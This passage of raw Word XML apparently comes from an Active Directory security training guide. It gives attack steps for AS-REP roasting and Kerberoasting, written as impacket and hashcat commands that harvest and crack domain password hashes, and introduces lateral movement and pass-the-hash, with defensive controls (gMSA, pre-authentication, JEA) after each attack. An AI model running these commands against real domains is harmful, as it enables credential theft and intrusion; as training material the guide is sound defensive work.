        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46CD105C" w14:textId="77777777" w:rsidR="0024425A" w:rsidRDefault="0024425A" w:rsidP="00AF0660">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="088D3B62" w14:textId="63F5E22C" w:rsidR="006D3130" w:rsidRPr="009270EB" w:rsidRDefault="00613A04" w:rsidP="00294E91">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6E7B6C8E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8640" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D2BC544" w14:textId="77777777" w:rsidR="006D3130" w:rsidRDefault="006D3130">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="80340D" w:themeColor="accent2" w:themeShade="80"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="71A389DA" w14:textId="50EAC395" w:rsidR="006D3130" w:rsidRPr="006D3130" w:rsidRDefault="00294E91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00294E91">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="80340D" w:themeColor="accent2" w:themeShade="80"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t># Harvest AS-REP ciphertexts for accounts lacking Pre-Authentication requirements</w:t>
            </w:r>
            <w:r w:rsidRPr="00294E91">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="80340D" w:themeColor="accent2" w:themeShade="80"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00294E91">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">impacket-getNPUsers </w:t>
            </w:r>
            <w:r w:rsidRPr="00294E91">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000088"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>domain</w:t>
            </w:r>
            <w:r w:rsidRPr="00294E91">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00294E91">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000088"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>local</w:t>
            </w:r>
            <w:r w:rsidRPr="00294E91">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>/ -usersfile valid_users.txt -</w:t>
            </w:r>
            <w:r w:rsidRPr="00294E91">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000088"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>format</w:t>
            </w:r>
            <w:r w:rsidRPr="00294E91">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> hashcat -outputfile asrep_hashes.txt -dc-ip &lt;DC_IP&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00294E91">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00294E91">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00294E91">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="80340D" w:themeColor="accent2" w:themeShade="80"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t># Offline cryptographic analysis using optimized GPU matrices</w:t>
            </w:r>
            <w:r w:rsidRPr="00294E91">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">hashcat -m </w:t>
            </w:r>
            <w:r w:rsidRPr="00294E91">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="006666"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>18200</w:t>
            </w:r>
            <w:r w:rsidRPr="00294E91">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> asrep_hashes.txt rockyou.txt -r /usr/</w:t>
            </w:r>
            <w:r w:rsidRPr="00294E91">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000088"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>share</w:t>
            </w:r>
            <w:r w:rsidRPr="00294E91">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>/hashcat/rules/best64.</w:t>
            </w:r>
            <w:r w:rsidRPr="00294E91">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000088"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>rule</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29EC6F6D" w14:textId="77777777" w:rsidR="006D3130" w:rsidRPr="00676591" w:rsidRDefault="006D3130">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="14332132" w14:textId="7D59DEE2" w:rsidR="006D3130" w:rsidRDefault="006D3130" w:rsidP="00613A04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="673B3148" w14:textId="77777777" w:rsidR="009270EB" w:rsidRPr="009270EB" w:rsidRDefault="00613A04" w:rsidP="00294E91">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Control:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A6F821" w14:textId="479982C9" w:rsidR="00345479" w:rsidRPr="00294E91" w:rsidRDefault="00613A04" w:rsidP="009270EB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00294E91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Audit and clear the </w:t>
      </w:r>
      <w:r w:rsidRPr="00294E91">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DON’T_REQ_PREAUTH</w:t>
      </w:r>
      <w:r w:rsidRPr="00294E91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag from all user attributes. Ensure the setting </w:t>
      </w:r>
      <w:r w:rsidRPr="0024425A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Account is sensitive and cannot be delegated</w:t>
      </w:r>
      <w:r w:rsidRPr="00294E91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is set on highly privileged accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F34C8A5" w14:textId="77777777" w:rsidR="00294E91" w:rsidRPr="00676591" w:rsidRDefault="00294E91" w:rsidP="00613A04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16A35F7B" w14:textId="0B202583" w:rsidR="00345479" w:rsidRPr="00294E91" w:rsidRDefault="00613A04" w:rsidP="00613A04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00294E91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Kerberoasting (Privileged Service Identity Recovery)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57223304" w14:textId="56E81709" w:rsidR="00613A04" w:rsidRPr="00676591" w:rsidRDefault="00613A04" w:rsidP="00613A04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00676591">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Request valid Service Tickets (TGS) to perform offline extraction of cleartext service passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656C9784" w14:textId="77777777" w:rsidR="00294E91" w:rsidRPr="00294E91" w:rsidRDefault="00294E91" w:rsidP="00294E91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D8D71DE" w14:textId="31DE863F" w:rsidR="006D3130" w:rsidRPr="009270EB" w:rsidRDefault="00613A04" w:rsidP="00294E91">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58D97286" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8640" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46562DF6" w14:textId="77777777" w:rsidR="006D3130" w:rsidRDefault="006D3130">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="80340D" w:themeColor="accent2" w:themeShade="80"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="40D0DC1A" w14:textId="77777777" w:rsidR="00294E91" w:rsidRPr="00294E91" w:rsidRDefault="00294E91" w:rsidP="00294E91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00294E91">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="80340D" w:themeColor="accent2" w:themeShade="80"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t># Enumerate target SPN identities within the current FICAM boundary</w:t>
            </w:r>
            <w:r w:rsidRPr="00294E91">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00294E91">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000088"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Get</w:t>
            </w:r>
            <w:r w:rsidRPr="00294E91">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>-ADUser -</w:t>
            </w:r>
            <w:r w:rsidRPr="00294E91">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000088"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Filter</w:t>
            </w:r>
            <w:r w:rsidRPr="00294E91">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName</w:t>
            </w:r>
            <w:r w:rsidRPr="00294E91">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00294E91">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00294E91">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="80340D" w:themeColor="accent2" w:themeShade="80"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t># Authenticate and request target SPN tickets for offline cryptanalysis</w:t>
            </w:r>
            <w:r w:rsidRPr="00294E91">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">impacket-getUserSPNs </w:t>
            </w:r>
            <w:r w:rsidRPr="00294E91">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000088"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>domain</w:t>
            </w:r>
            <w:r w:rsidRPr="00294E91">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00294E91">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000088"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>local</w:t>
            </w:r>
            <w:r w:rsidRPr="00294E91">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>/low_priv_user:Password123 -request -dc-ip &lt;DC_IP&gt; -outputfile tgs_hashes.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19EDF4EA" w14:textId="77777777" w:rsidR="006D3130" w:rsidRPr="00676591" w:rsidRDefault="006D3130" w:rsidP="00294E91">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3CBA2E42" w14:textId="77777777" w:rsidR="006D3130" w:rsidRPr="00676591" w:rsidRDefault="006D3130" w:rsidP="00613A04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C1371E9" w14:textId="77777777" w:rsidR="009270EB" w:rsidRPr="009270EB" w:rsidRDefault="00613A04" w:rsidP="00613A04">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Control:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DC1DF9" w14:textId="6894831D" w:rsidR="00294E91" w:rsidRPr="00442C76" w:rsidRDefault="00613A04" w:rsidP="00442C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00676591">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Transition high-value legacy services to Group Managed Service Accounts (gMSA), which feature complex, system-managed 128-character passwords that are rotated automatically every 30 days.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC2A696" w14:textId="622AE843" w:rsidR="00613A04" w:rsidRPr="00294E91" w:rsidRDefault="00613A04" w:rsidP="00613A04">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00294E91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Module 4: Protocol Transport and Identity Impersonation (Execution Controls)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B4AA3A" w14:textId="77777777" w:rsidR="009270EB" w:rsidRPr="009270EB" w:rsidRDefault="00613A04" w:rsidP="00613A04">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lastRenderedPageBreak/>
        <w:t>Offensive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355962AA" w14:textId="1B5A77DA" w:rsidR="00613A04" w:rsidRPr="0024425A" w:rsidRDefault="00613A04" w:rsidP="009270EB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00676591">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Execute lateral movement, leverage valid administrative hashes, and establish authenticated operational shells on administrative surfaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F6801A" w14:textId="77777777" w:rsidR="0024425A" w:rsidRPr="00676591" w:rsidRDefault="0024425A" w:rsidP="0024425A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38717EEB" w14:textId="77777777" w:rsidR="009270EB" w:rsidRPr="009270EB" w:rsidRDefault="00613A04" w:rsidP="00613A04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009270EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>Defensive Objective</w:t>
      </w:r>
      <w:r w:rsidR="009270EB" w:rsidRPr="009270EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="009270EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3928EA64" w14:textId="40FCAC79" w:rsidR="00613A04" w:rsidRPr="00676591" w:rsidRDefault="00613A04" w:rsidP="009270EB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00676591">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Enforce strict administrative isolation. Disable Remote Management capabilities on domain controllers for standards users and constrain PowerShell Remoting (PSR) to explicit Just Enough Administration (JEA) structures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D7418E" w14:textId="05DE174B" w:rsidR="00613A04" w:rsidRPr="00294E91" w:rsidRDefault="00613A04" w:rsidP="00613A04">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00294E91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Technical Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75198447" w14:textId="79714FA1" w:rsidR="00556DCC" w:rsidRPr="00294E91" w:rsidRDefault="00556DCC" w:rsidP="00556DCC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00294E91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Pass-the-Hash (PtH) Protocol Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB415CE" w14:textId="757D9325" w:rsidR="00556DCC" w:rsidRPr="00676591" w:rsidRDefault="00556DCC" w:rsidP="00556DCC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00676591">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Authenticate to administrative entry points without providing the cleartext password by leveraging valid NT network hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F9E47D" w14:textId="77777777" w:rsidR="00294E91" w:rsidRPr="00294E91" w:rsidRDefault="00294E91" w:rsidP="00294E91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
